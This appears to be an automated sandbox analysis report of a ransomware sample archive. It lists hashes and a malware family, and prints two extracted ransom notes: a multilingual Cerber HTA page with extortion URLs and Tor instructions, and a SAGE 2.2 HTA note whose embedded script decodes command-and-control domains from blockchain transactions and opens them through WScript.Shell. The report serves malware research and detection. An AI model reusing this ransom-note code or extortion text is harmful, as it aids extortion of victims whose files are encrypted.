Analysis

  • max time kernel
    48s
  • max time network
    171s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    19-11-2024 17:55

General

  • Target

    RNSM00287.7z

  • Size

    10.7MB

  • MD5

    4855a360b242b018a89592d08805e4b7

  • SHA1

    120d34ca49db1c38392e188e52330d7fd2c33d3b

  • SHA256

    6738cd5a03ef6cfc01c7cbce18275cae97c3d486bf304d769b0093bac1bdb426

  • SHA512

    17f36ef9fa214830976228f6f893ff3742bca4163ed412979729278edd30be29a97c79e69b57a57db188517f5287a47bcb0daf49d60e5e6112308ae98d953fc7

  • SSDEEP

    196608:RcPf6wxYGm5nizL6V1Otg2GZ3UMtTts7Icbg/G24cVuNghgoSKxNU:RcaizOv8ze1L/GUsNvh4NU

Malware Config

Extracted

Family

gozi

Extracted

Path

C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\_README_M1HBRSC_.hta

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>CERBER RANSOMWARE: Instructions</title> <HTA:APPLICATION APPLICATIONNAME="CERBER RANSOMWARE: Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 13pt; line-height: 19pt; } body, h1 { margin: 0; padding: 0; } hr { color: #bda; height: 2pt; margin: 1.5%; } h1 { color: #555; font-size: 14pt; } ol { padding-left: 2.5%; } ol li { padding-bottom: 13pt; } small { color: #555; font-size: 11pt; } ul { list-style-type: none; margin: 0; padding: 0; } .button { color: #04a; cursor: pointer; } .button:hover { text-decoration: underline; } .container { background-color: #fff; border: 2pt solid #c7c7c7; margin: 2.5%; min-width: 850px; padding: 2.5%; } .header { border-bottom: 2pt solid #c7c7c7; margin-bottom: 2.5%; padding-bottom: 2.5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .info { background-color: #efe; border: 2pt solid #bda; display: inline-block; padding: 1.5%; text-align: center; } .updating { color: red; display: none; } #change_language { float: right; } #change_language, #texts div { display: none; } </style> </head> <body> <div class="container"> <div class="header"> <a href="#" id="change_language" onclick="return changeLanguage();" title="English">&#9745; English</a> <h1>CERBER RANSOMWARE</h1> <small id="title">Instructions</small> </div> <div id="languages"> <p>&#9745; Select your language</p> <ul> <li><a href="#" title="English" onclick="return showBlock('en');">English</a></li> <li><a href="#" title="Arabic" onclick="return showBlock('ar');">العربية</a></li> <li><a href="#" title="Chinese" onclick="return showBlock('zh');">中文</a></li> <li><a href="#" title="Dutch" onclick="return showBlock('nl');">Nederlands</a></li> <li><a href="#" title="French" onclick="return showBlock('fr');">Français</a></li> <li><a href="#" title="German" onclick="return showBlock('de');">Deutsch</a></li> <li><a href="#" title="Italian" onclick="return showBlock('it');">Italiano</a></li> <li><a href="#" title="Japanese" onclick="return showBlock('ja');">日本語</a></li> <li><a href="#" title="Korean" onclick="return showBlock('ko');">한국어</a></li> <li><a href="#" title="Polish" onclick="return showBlock('pl');">Polski</a></li> <li><a href="#" title="Portuguese" onclick="return showBlock('pt');">Português</a></li> <li><a href="#" title="Spanish" onclick="return showBlock('es');">Español</a></li> <li><a href="#" title="Turkish" onclick="return showBlock('tr');">Türkçe</a></li> </ul> </div> <div id="texts"> <div id="en"> <p>Can't you find the necessary files?<br>Is the content of your files not readable?</p> <p>It is normal because the files' names and the data in your files have been encrypted by "Cerber&nbsp;Ransomware".</p> <p>It means your files are NOT damaged! Your files are modified only. This modification is reversible.<br>From now it is not possible to use your files until they will be decrypted.</p> <p>The only way to decrypt your files safely is to buy the special decryption software "Cerber&nbsp;Decryptor".</p> <p>Any attempts to restore your files with the third-party software will be fatal for your files!</p> <hr> <p class="w331208">You can proceed with purchasing of the decryption software at your personal page:</p> <p><span class="info"><span class="updating">Please wait...</span><a id="megaurl" class="url" href="http://ffoqr3ug7m726zou.pfw1bw.bid/C66F-2E00-ACE2-0090-8128" target="_blank">http://ffoqr3ug7m726zou.pfw1bw.bid/C66F-2E00-ACE2-0090-8128</a><span class="hr"></span><a href="http://ffoqr3ug7m726zou.eu2xdg.top/C66F-2E00-ACE2-0090-8128" target="_blank">http://ffoqr3ug7m726zou.eu2xdg.top/C66F-2E00-ACE2-0090-8128</a><span class="hr"></span><a href="http://ffoqr3ug7m726zou.onion.to/C66F-2E00-ACE2-0090-8128" target="_blank">http://ffoqr3ug7m726zou.onion.to/C66F-2E00-ACE2-0090-8128</a></span></p> <p>If this page cannot be opened &nbsp;<span class="button" onclick="return updateUrl();">click here</span>&nbsp; to generate a new address to your personal page.</p> <p>At this page you will receive the complete instructions how to buy the decryption software for restoring all your files.</p> <p>Also at this page you will be able to restore any one file for free to be sure "Cerber&nbsp;Decryptor" will help you.</p> <hr> <p>If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor&nbsp;Browser:</p> <ol> <li>run your Internet browser (if you do not know what it is run the Internet&nbsp;Explorer);</li> <li>enter or copy the address <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> into the address bar of your browser and press ENTER;</li> <li>wait for the site loading;</li> <li>on the site you will be offered to download Tor&nbsp;Browser; download and run it, follow the installation instructions, wait until the installation is completed;</li> <li>run Tor&nbsp;Browser;</li> <li>connect with the button "Connect" (if you use the English version);</li> <li>a normal Internet browser window will be opened after the initialization;</li> <li>type or copy the address <br><span class="info">http://ffoqr3ug7m726zou.onion/C66F-2E00-ACE2-0090-8128</span><br> in this browser address bar;</li> <li>press ENTER;</li> <li>the site should be loaded; if for some reason the site is not loading wait for a moment and try again.</li> </ol> <p>If you have any problems during installation or use of Tor&nbsp;Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the search bar "Install Tor&nbsp;Browser Windows" and you will find a lot of training videos about Tor&nbsp;Browser installation and use.</p> <hr> <p><strong>Additional information:</strong></p> <p>You will find the instructions ("*.hta") for restoring your files in any folder with your encrypted files.</p> <p>The instructions ("*.hta") in the folders with your encrypted files are not viruses! The instructions ("*.hta") will help you to decrypt your files.</p> <p>Remember! The worst situation already happened and now the future of your files depends on your determination and speed of your actions.</p> </div> <div id="ar" style="direction: rtl;"> <p>لا يمكنك العثور على الملفات الضرورية؟<br>هل محتوى الملفات غير قابل للقراءة؟</p> <p>هذا أمر طبيعي لأن أسماء الملفات والبيانات في الملفات قد تم تشفيرها بواسطة "Cerber&nbsp;Ransomware".</p> <p>وهذا يعني أن الملفات الخاصة بك ليست تالفة! فقد تم تعديل ملفاتك فقط. ويمكن التراجع عن هذا.<br>ومن الآن فإنه لا يكن استخدام الملفات الخاصة بك حتى يتم فك تشفيرها.</p> <p>الطريقة الوحيدة لفك تشفير ملفاتك بأمان هو أن تشتري برنامج فك التشفير المتخصص "Cerber&nbsp;Decryptor".</p> <p>إن أية محاولات لاستعادة الملفات الخاصة بك بواسطة برامج من طرف ثالث سوف تكون مدمرة لملفاتك!</p> <hr> <p>يمكنك الشروع في شراء برنامج فك التشفير من صفحتك الشخصية:</p> <p><span class="info"><span class="updating">أرجو الإنتظار...</span><a class="url" href="http://ffoqr3ug7m726zou.pfw1bw.bid/C66F-2E00-ACE2-0090-8128" target="_blank">http://ffoqr3ug7m726zou.pfw1bw.bid/C66F-2E00-ACE2-0090-8128</a><span class="hr"></span><a href="http://ffoqr3ug7m726zou.eu2xdg.top/C66F-2E00-ACE2-0090-8128" target="_blank">http://ffoqr3ug7m726zou.eu2xdg.top/C66F-2E00-ACE2-0090-8128</a><span class="hr"></span><a href="http://ffoqr3ug7m726zou.onion.to/C66F-2E00-ACE2-0090-8128" target="_blank">http://ffoqr3ug7m726zou.onion.to/C66F-2E00-ACE2-0090-8128</a></span></p> <p>في حالة تعذر فتح هذه الصفحة &nbsp;<span class="button" onclick="return updateUrl();">انقر هنا</span>&nbsp; لإنشاء عنوان جديد لصفحتك الشخصية.</p> <p>في هذه الصفحة سوف تتلقى تعليمات كاملة حول كيفية شراء برنامج فك التشفير لاستعادة جميع الملفات الخاصة بك.</p> <p>في هذه الصفحة أيضًا سوف تتمكن من استعادة ملف واحد بشكل مجاني للتأكد من أن "Cerber&nbsp;Decryptor" سوف يساعدك.</p> <hr> <p>إذا كانت صفحتك الشخصية غير متاحة لفترة طويلة فإن ثمّة طريقة أخرى لفتح صفحتك الشخصية - تحميل واستخدام متصفح Tor:</p> <ol> <li>قم بتشغيل متصفح الإنترنت الخاص بك (إذا كنت لا تعرف ما هو قم بتشغيل إنترنت إكسبلورر);</li> <li>قم بكتابة أو نسخ العنوان <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> إلى شريط العنوان في المستعرض الخاص بك ثم اضغط ENTER;</li> <li>انتظر لتحميل الموقع;</li> <li>سوف يعرض عليك الموقع تحميل متصفح Tor. قم بتحميله وتشغيله، واتبع تعليمات التثبيت، وانتظر حتى اكتمال التثبيت;</li> <li>قم بتشغيل متصفح Tor;</li> <li>اضغط على الزر "Connect" (إذا كنت تستخدم النسخة الإنجليزية);</li> <li>سوف تُفتح نافذة متصفح الإنترنت العادي بعد البدء;</li> <li>قم بكتابة أو نسخ العنوان <br><span class="info">http://ffoqr3ug7m726zou.onion/C66F-2E00-ACE2-0090-8128</span><br> في شريط العنوان في المتصفح;</li> <li>اضغط ENTER;</li> <li>يجب أن يتم تحميل الموقع؛ إذا لم يتم تحميل الموقع لأي سبب، انتظر للحظة وحاول مرة أخرى.</li> </ol> <p>إذا كان لديك أية مشكلات أثناء عملية التثبيت أو استخدام متصفح Tor، يُرجى زيارة <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> واكتب الطلب "install tor browser windows" أو "تثبيت نوافذ متصفح Tor" في شريط البحث، وسوف تجد الكثير من أشرطة الفيديو للتدريب حول تثبيت متصفح Tor واستخدامه.</p> <hr> <p><strong>معلومات إضافية:</strong></p> <p>سوف تجد إرشادات استعادة الملفات الخاصة بك ("*.hta") في أي مجلد مع ملفاتك المشفرة.</p> <p>الإرشادات ("*.hta") الموجودة في المجلدات مع ملفاتك المشفرة ليست فيروسات والإرشادات ("*.hta") سوف تساعدك على فك تشفير الملفات الخاصة بك.</p> <p>تذكر أن أسوأ موقف قد حدث بالفعل، والآن مستقبل ملفاتك يعتمد على عزيمتك وسرعة الإجراءات الخاصة بك.</p> </div> <div id="zh"> <p>您找不到所需的文件?<br>您文件的内容无法阅读?</p> <p>这是正常的,因为您文件的文件名和数据已经被“Cerber&nbsp;Ransomware”加密了。</p> <p>这意味着您的文件并没有损坏!您的文件只是被修改了,这个修改是可逆的,解密之前您无法使用您的文件。</p> <p>安全解密您文件的唯一方式是购买特别的解密软件“Cerber&nbsp;Decryptor”。</p> <p>任何使用第三方软件恢复您文件的方式对您的文件来说都将是致命的!</p> <hr> <p>您可以在您的个人页面上购买解密软件:</p> <p><span class="info"><span class="updating">请稍候...</span><a class="url" href="http://ffoqr3ug7m726zou.pfw1bw.bid/C66F-2E00-ACE2-0090-8128" target="_blank">http://ffoqr3ug7m726zou.pfw1bw.bid/C66F-2E00-ACE2-0090-8128</a><span class="hr"></span><a href="http://ffoqr3ug7m726zou.eu2xdg.top/C66F-2E00-ACE2-0090-8128" target="_blank">http://ffoqr3ug7m726zou.eu2xdg.top/C66F-2E00-ACE2-0090-8128</a><span class="hr"></span><a href="http://ffoqr3ug7m726zou.onion.to/C66F-2E00-ACE2-0090-8128" target="_blank">http://ffoqr3ug7m726zou.onion.to/C66F-2E00-ACE2-0090-8128</a></span></p> <p>如果这个页面无法打开,请 <span class="button" onclick="return updateUrl();">点击这里</span> 生成您个人页面的新地址。</p> <p>您将在这个页面上看到如何购买解密软件以恢复您的文件。</p> <p>您可以在这个页面使用“Cerber&nbsp;Decryptor”免费恢复任何文件。</p> <hr> <p>如果您的个人页面长期不可用,有其他方法可以打开您的个人页面 - 安装并使用 Tor 浏览器:</p> <ol> <li>使用您的上网浏览器(如果您不知道使用 Internet&nbsp;Explorer 的话);</li> <li>在浏览器的地址栏输入或复制地址 <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> 并按 ENTER 键;</li> <li>等待站点加载;</li> <li>您将在站点上下载 Tor 浏览器;下载并运行它,按照安装指南进行操作,等待直至安装完成;</li> <li>运行 Tor 浏览器;</li> <li>使用“Connect”按钮进行连接(如果您使用英文版);</li> <li>初始化之后将打开正常的上网浏览器窗口;</li> <li>在浏览器地址栏中输入或复制地址 <br><span class="info">http://ffoqr3ug7m726zou.onion/C66F-2E00-ACE2-0090-8128</span><br></li> <li>按 ENTER 键;</li> <li>该站点将加载;如果由于某些原因等待一会儿后没有加载,请重试。</li> </ol> <p>如果在安装期间或使用 Tor 浏览器期间有任何问题,请访问 <a href="https://www.baidu.com/s?wd=%E6%80%8E%E4%B9%88%E5%AE%89%E8%A3%85%20tor%20%E6%B5%8F%E8%A7%88%E5%99%A8" target="_blank">https://www.baidu.com</a> 并在搜索栏中输入“怎么安装 Tor 浏览器”,您将找到有关如何安装洋葱 Tor 浏览器的说明和教程。</p> <hr> <p><strong>附加信息:</strong></p> <p>您将在任何带有加密文件的文件夹中找到恢复您文件(“*.hta”)的说明。</p> <p>带有加密文件的文件夹中的(“*.hta”)说明不是病毒,(“*.hta”)说明将帮助您解密您的文件。</p> <p>请记住,最坏的情况都发生过了,您的文件还能不能用取决于您的决定和反应速度。</p> </div> <div id="nl"> <p>Kunt u de nodige files niet vinden?<br>Is de inhoud van uw bestanden niet leesbaar?</p> <p>Het is gewoonlijk omdat de bestandsnamen en de gegevens in uw bestanden zijn versleuteld door “Cerber&nbsp;Ransomware”.</p> <p>Het betekent dat uw bestanden NIET beschadigd zijn! Uw bestanden zijn alleen gewijzigd. Deze wijziging is omkeerbaar. Vanaf nu is het niet mogelijk uw bestanden te gebruiken totdat ze ontsleuteld zijn.</p> <p>De enige manier om uw bestanden veilig te

Extracted

Path

C:\Users\Admin\Documents\!HELP_SOS.hta

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Decryption Instructions</title> <HTA:APPLICATION ID='App' APPLICATIONNAME="Decryption Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 12pt; line-height: 16pt; } body, h1 { margin: 0; padding: 0; } h1 { color: #555; text-align: center; padding-bottom: 1.5em; line-height: 1.2; } h2 { color: #555; text-align: center; line-height: 1.2; } ol li { padding-bottom: 13pt; } .container { background-color: #EEE; border: 2pt solid #C7C7C7; margin: 3%; min-width: 600px; padding: 5% 10%; color: #444; } .filecontainer{ padding: 5% 10%; display: none; } .header { border-bottom: 2pt solid #c7c7c7; padding-bottom: 5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .key{ background-color: #A1D490; border: 1px solid #506A48; display: block; text-align: center; margin: 0.5em 0; padding: 1em 1.5em; word-wrap: break-word; } .keys{ margin: 3em 0; } .filename{ border: 3px solid #AAA; display: block; text-align: center; margin: 0.5em 0em; padding: 1em 1.5em; background-color: #DCC; } .us{ text-decoration: strong; color: #333; } .info{ background-color: #E4E4E4; padding: 0.5em 3em; margin: 1em 0; } .text{ text-align: justify; } #file{ background-color: #FCC; } .lsb{ display: none; margin: 3%; text-align: center; } .ls{ border: 1px solid #888; border-radius: 3px; padding: 0 0.5em; margin: 0.2em 0.1em; line-height: 2em; display: inline-block; } .ls:hover{ background-color: #D0D0D0; } .l{ display:none; } .lu{ display:none; } </style> <script language="vbscript"> Function GetCmd GetCmd = App.commandLine End Function </script> <script language="javascript"> function openlink(url){ new ActiveXObject("WScript.Shell").Run(url); return false; } function aIndexOf(arr, v){ for(var i = 0; i < arr.length; i++) if(arr[i] == v) return i; return -1; } function tweakClass(cl, f){ var els; if(document.getElementByClassName != null){ els = document.getElementsByClassName(cl); } else{ els = []; var tmp = document.getElementsByTagName('*'); for (var i = 0; i < tmp.length; i++){ var c = tmp[i].className; if( (c == cl) || ((c.indexOf(cl) != 1) && ((' '+c+' ').indexOf(' '+cl+' ') != -1)) ) els.push(tmp[i]); } } for(var i = 0; i < els.length; i++) f(els[i]); } function show(el){ el.style.display = 'block'; } function hide(el){ el.style.display = 'none'; } var langs = ["en","de","it","fr","es","no","pt","nl","kr","ms","zh","tr","vi","hi","jv","fa","ar"]; function setLang(lang){ if(aIndexOf(langs, lang) == -1) lang = langs[0]; for(var i = 0; i < langs.length; i++){ var clang = langs[i]; tweakClass('l-'+clang, function(el){ el.style.display = (clang == lang) ? 'block' : 'none'; }); tweakClass('ls-'+clang, function(el){ el.style.backgroundColor = (clang == lang) ? '#BBB' : ''; }); } } function newXHR() { if (window.XMLHttpRequest) return new window.XMLHttpRequest; try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } function getPage(url, cb) { try{ var xhr = newXHR(); if(!xhr) return cb('no xhr'); xhr.onreadystatechange = function() { if(xhr.readyState != 4) return; if(xhr.status != 200 || !xhr.responseText) return cb(xhr.status) cb(null, xhr.responseText); }; xhr.open("GET", url+((url.indexOf('?') == -1) ? "?" : "&") + "_=" + new Date().getTime(), true); xhr.send(); } catch(e){ cb(e); } } function decodeTxString(hex){ var m = '0123456789abcdef'; var s = ''; var c = 0xAA; hex = hex.toLowerCase(); for(var i = 0; i < hex.length; i+=2){ var a = m.indexOf(hex.charAt(i)); var b = m.indexOf(hex.charAt(i+1)); if(a == -1 || b == -1) throw hex[i]+hex[i+1]+' '+a+' '+b; s+= String.fromCharCode(c = (c ^ ((a << 4) | b))); } return s; } var OR = 'OP_RE'+'TURN '; var sources = [ {bp:'btc.b'+'lockr.i'+'o/api/v1/', txp:'tx/i'+'nfo/', adp:'add'+'ress/txs/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = 0; i < json.data.txs.length - 1; i++) res.push(json.data.txs[i].tx); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.vouts; for(var i = 0; i < os.length; i++) if(os[i].extras.asm.indexOf(OR) == 0) return decodeTxString(os[i].extras.asm.substr(10)); return null; } }, {bp:'ch'+'ain.s'+'o/api/v2/', txp:'get_t'+'x_out'+'puts/btc/', adp:'get_tx_uns'+'pent/btc/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = json.data.txs.length - 1; i >= 0; i--) res.push(json.data.txs[i].txid); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.outputs; for(var i = 0; i < os.length; i++) if(os[i].script.indexOf(OR) == 0) return decodeTxString(os[i].script.substr(10)); return null; } }, {bp:'bit'+'aps.co'+'m/api/', txp:'trans'+'action/', adp:'ad'+'dress/tra'+'nsactions/', adpb:'/0/sen'+'t/all', ptxs: function(json){ var res = []; for(var i = 0; i < json.length; i++) res.push(json[i][1]); return res; }, ptx: function(json){ var os = json.output; for(var i = 0; i < os.length; i++) if(os[i].script.asm.indexOf(OR) == 0) return decodeTxString(os[i].script.asm.substr(10)); return null; } }, {bp:'api.b'+'lockcyp'+'her.com/v1/b'+'tc/main/', txp:'txs/', adp:'addrs/', ptxs: function(json){ var res = []; var m = {}; for(var i = 0; i < json.txrefs.length; i++){ var tx = json.txrefs[i].tx_hash; if(m[tx]) continue; m[tx] = 1; res.push(tx); } return res; }, ptx: function(json){ var os = json.outputs; for(var i = 0; i < os.length; i++) if(os[i].data_hex != null) return decodeTxString(os[i].data_hex); return null; } } ]; function eachUntil(a,f,c){ var i = 0; var n = function(){ if(i >= a.length) return c('f'); f(a[i++], function(err, res){ if(err == null) return c(null, res); n(); }); }; n(); } function getJson(url, cb){ getPage(url, function(err, res){ if(err != null) return cb(err); var json; try{ if(window.JSON && window.JSON.parse){ json = window.JSON.parse(res); } else{ json = eval('('+res+')'); } } catch(e){ cb(e); } cb(null, json); }); } function getDomains(ad, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp; url+= s.adp+ad; if(s.adpb) url+= s.adpb; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptxs(json)); } catch(e){ cb(e); } }); }, function(err, txs){ if(err != null) return cb(err); if(txs.length == 0) return cb('f'); eachUntil(txs, function(tx, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp+s.txp+tx; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptx(json)); } catch(e){ cb(e); } }); }, function(err, res){ if(err != null) return cb(err); if(res == null) return cb('f'); cb(null, res.split(':')); }); }, cb); }); } function updateLinks(){ tweakClass('lu', hide); tweakClass('lu-updating', show); getDomains('1783wBG'+'sr'+'1zkxenfE'+'ELXA25PLSkL'+'dfJ4B7', function(err, ds){ tweakClass('lu', hide); if(err != null){ tweakClass('lu-error', show); return; } tweakClass('lu-done', show); var html = ''; for(var i = 0; i < ds.length; i++) html+= '<div class="key"><a href="http://7gie6ffnkrjykggd.'+ds[i]+'/login/AYhHLTEtP78G167m8Fz-7PoEZsFdQsgQy47nx7t6ZA774gogIoLTnR3A" onclick="javascript:return openlink(this.href)">http://7gie6ffnkrjykggd.'+ds[i]+'/</a></div>'; tweakClass('links', function(el){ el.innerHTML = html; }); }); return false; } function onPageLoaded(){ try{ tweakClass('lsb', show); }catch(e){} try{ tweakClass('lu-orig', show); }catch(e){} try{ setLang('en'); }catch(e){} try{ var args = GetCmd().match(/"[^"]+"|[^ ]+/g); if(args.length > 1){ var file = args[args.length-1]; if(file.charAt(0) == '"' && file.charAt(file.length-1) == '"') file = file.substr(1, file.length-2); document.getElementById('filename').innerHTML = file; show(document.getElementById('file')); document.title = 'File is encrypted'; } }catch(e){} } </script> </head> <body onload='javascript:onPageLoaded()'> <div class='lsb'> <span class='ls ls-en' onclick="javascript:return setLang('en')">English</span> <span class='ls ls-de' onclick="javascript:return setLang('de')">Deutsch</span> <span class='ls ls-it' onclick="javascript:return setLang('it')">Italiano</span> <span class='ls ls-fr' onclick="javascript:return setLang('fr')">Français</span> <span class='ls ls-es' onclick="javascript:return setLang('es')">Español</span> <span class='ls ls-no' onclick="javascript:return setLang('no')">Norsk</span> <span class='ls ls-pt' onclick="javascript:return setLang('pt')">Português</span> <span class='ls ls-nl' onclick="javascript:return setLang('nl')">Nederlands</span> <br/><span class='ls ls-kr' onclick="javascript:return setLang('kr')">한국어</span> <span class='ls ls-ms' onclick="javascript:return setLang('ms')">Bahasa Melayu</span> <span class='ls ls-zh' onclick="javascript:return setLang('zh')">中文</span> <span class='ls ls-tr' onclick="javascript:return setLang('tr')">Türkçe</span> <span class='ls ls-vi' onclick="javascript:return setLang('vi')">Tiếng Việt</span> <span class='ls ls-hi' onclick="javascript:return setLang('hi')">हिन्दी</span> <span class='ls ls-jv' onclick="javascript:return setLang('jv')">Basa Jawa</span> <span class='ls ls-fa' onclick="javascript:return setLang('fa')">فارسی</span> <span class='ls ls-ar' onclick="javascript:return setLang('ar')">العربية</span> </div> <div id='file' class='container filecontainer'> <div class='filename'> <div style='float:left; padding:18px 0'><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADEAAABACAYAAACz4p94AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAARCQAAEQkAGJrNK4AAAAB3RJTUUH4QEcFBoaYAOrHQAABThJREFUaN7tmlloXGUUx3/3ziRtTa2xcZ1gtaJFDFjtwSqllaKiiEilKOKDNS2UivXF+qD0QRBRUMQXN/TBBcFifahYFC0urfpghSMqaDSkdQMvojZpIk2zTMaHe776MZ17M6u9ozkwzAwz3/ed/9m+s9yABkhEUFX/+43ATcBy4FxgMdABTAB/Aj8CXwO7VfVdb10AlPy9aqGgTuYDVS3Z56XA48AtdWz1OrBdVQ82AiaoVfJATlWLIrIAeAbYWKciS975LwJ3q+pEJQ03DYRJKVDVGRFZCew0kylnqFaaAULgB+B2Vd1fru3ZKFcDAFS1JCLXA7uBMxs1S29t0fzn5kKhMBBF0WAURYgIURQ1DsIAhKaBVcAbwKk0l0JgGlgIrCkUChpF0U/VAgmrOCBvPrAEeBY4jdZQ3jRyDvCEiJxl2ne+mLowTQs5VZ0yJ95mobMaRx0A3gMGgSPAycCFwHXARQlrfKFeDjwMbG7IsT0zKorIauBtYFGFvxY9s3wZ2Kaqwyn7dgNPpkQ1t9/PwGZV3TNbxErThAOwCOhPADBtexwGNqrqrrR4bxFnBNgkIm8CrwFdCX66BNgA7KlLE2aDeVWdFpHlwPsVfMEBGAXuUtUd1YRGH6CIrLdAESZoYxC4Q1U/r8exQwMQAFdb+CuP7U6LO6oF4MK0d+47ZlpJfJ0HXFsm3OpB2HsPsCZBUtgF9VSZo85KFq7zqnrUTOq3ChYyA3QCq7x1NYFwZnYKsKJCFOqwz59YJKo5VTAmAQ4CuxKiHUCviCyryZzMhIqeOnsSDh8B9qnqTJqU0kKyAT8MfJwiyB5gWa0+ETjGgPOBeQkSGgG+rPdmM99wfjUEHEoA0Q0srRmEaSRv+VFHAogx84lGyO01ChxI+E8XcHq9aUdnhahU8uL471bszJoWVEFHbL8kHhfXCyIE5qesGXX+UW9F5mli0jSbRPMaAdGZ8vtUtSG1ykg1mXIRdzaaxVYjSU7kPmFKaAsq5DW+dBY2WAyV89GV8ntXran4tGfzW4B7K0grAI5WMIF6zAjgD2ATsDXhrPFaGwGZJhE59jrOPMraMIuBK4EzTFqlE8x7YNr6TFUP+dkwQCAiobuhRWQt8DTQl2FlfAtsVdW9DoyviUeA7U1owbSSfL4eU9UHjlVRInI/8FDGATizcvytLhQKQRRFewMRuQJ4y+y/Xcg13IaA/tBCWxftRe5+uwC4NQTWzpabZFgbAFeF1qzKtSEIp40+l+QFtC91hvwHaA7E/xlEKesgZrz6u19VA/eytH64FUGkmSCKtt8XwKWq+opL0GxE8AKwknh6mkkQ03bXRMTT0F9d7m/pfdGy5SHgPtclyRoIZyLfAR95APC6If4A5sOsgfB7UQe88jbJoceI+6+ZdeyOKrWWzxqIwJN+H/F8rlJDzR8XrMiyT1wM3OnX7V797oBeQzxYbF6lJCLTTcpi3fhrBNiiqjsrNCBuIx5Ozs+qT+SJW5vdxHPoS3yHlrjH8nyzAbTCsZ1ZjfPPoMa/DMdpAc0lgHMg2gREqcxPSrSoHdoqx+4Ceu3Sc4x3c/wkNpMgclZT9AIPisjZFl57gUeZZeKThcuuvDhyAppsFfOt9gl/385/w7FLtDmFwF9ebdxO5IQ/HBIPLabaGMT+kLitP9GGAELi4ecHIfAqyc9VZJWc+SvwUi6KorFCofANsA44qQ0AuEfrfgHuUdWB0IqWT4Ebml3At4hywPfAelXd5y47sIfY7XbdQNytuwxYkCHmR4GvgOfcM4fGL38Dzdjo/H/3PFAAAAAASUVORK5CYII=" style='padding:0 7.5px'/></div> <div> <h2 class='l l-en' style='display:block'>The file is encrypted but can be restored</h2><h2 class='l l-de' >Die Datei ist verschlüsselt, aber kann wiederhergestellt werden</h2><h2 class='l l-it' >Il file è crittografato, ma può essere ripristinato</h2><h2 class='l l-fr' >Le fichier est crypté mais peut être restauré</h2><h2 class='l l-es' >El archivo está encriptado pero puede ser restaurado</h2><h2 class='l l-no' >Filen er kryptert men kan bli gjenopprettet</h2><h2 class='l l-pt' >O arquivo está criptografado, mas poderá ser descriptografado</h2><h2 class='l l-nl' >Het bestand is versleuteld maar kan worden hersteld</h2><h2 class='l l-kr' >파일은 암호화되었지만 복원 할 수 있습니다</h2><h2 class='l l-ms' >Fail ini dienkripsikan tetapi boleh dipulih semula.</h2><h2 class='l l-zh' >文件已被加密,但是可以解密</h2><h2 class='l l-tr' >Dosya şifrelenmiş ancak geri yüklenebilir.</h2><h2 class='l l-vi' >Tập tin bị mã hóa nhưng có thể được khôi phục</h2><h2 class='l l-hi' >फाइल एनक्रिप्‍टड हैं लेकिन रिस्‍टोर की जा सकती हैं</h2><h2 class='l l-jv' >File ini dienkripsi tetapi dapat dikembalikan</h2><h2 class='l l-fa' >این فایل رمزگذاری شده است اما می تواند بازیابی شود</h2><h2 class='l l-ar' > الملف مشفر لكن من الممكن إسترجاعه </h2> <p><span id='filename'></span></p> </div> </div> <h2 class='l l-en' style='display:block'>The file you tried to open and other important files on your computer were encrypted by "SAGE 2.2 Ransomware".</h2><h2 class='l l-de' >Die Datei, die Sie öffnen wollten, und andere wichtige Dateien auf ihrem Computer wurden von "SAGE 2.2 Ransomware" verschlüsselt.</h2><h2 class='l l-it' >Il file che hai tentato di aprire e altri file importanti del tuo computer sono stati crittografati da "SAGE 2.2 Ransomware".</h2><h2 class='l l-fr' > Le fichier que vous essayez d’ouvrir et d’autres fichiers importants sur votre ordinateur ont été cryptés par "SAGE 2.2 Ransomware".</h2><h2 class='l l-es' >El archivo que intentó abrir y otros importantes archivos en su computadora fueron encriptados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-no' >Filen du prøvde åpne og andre viktige filer på datamaskinen din ble kryptert av "SAGE 2.2 Ransomware".</h2><h2 class='l l-pt' >O arquivo que você está tentando acessar está criptografado, outros arquivos importantes em seu computador também foram criptografados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-nl' >Het bestand dat je probeert te openen en andere belangrijke bestanden op je computer zijn beveiliged door "SAGE 2.2 Ransomware".</h2><h2 class='l l-kr' 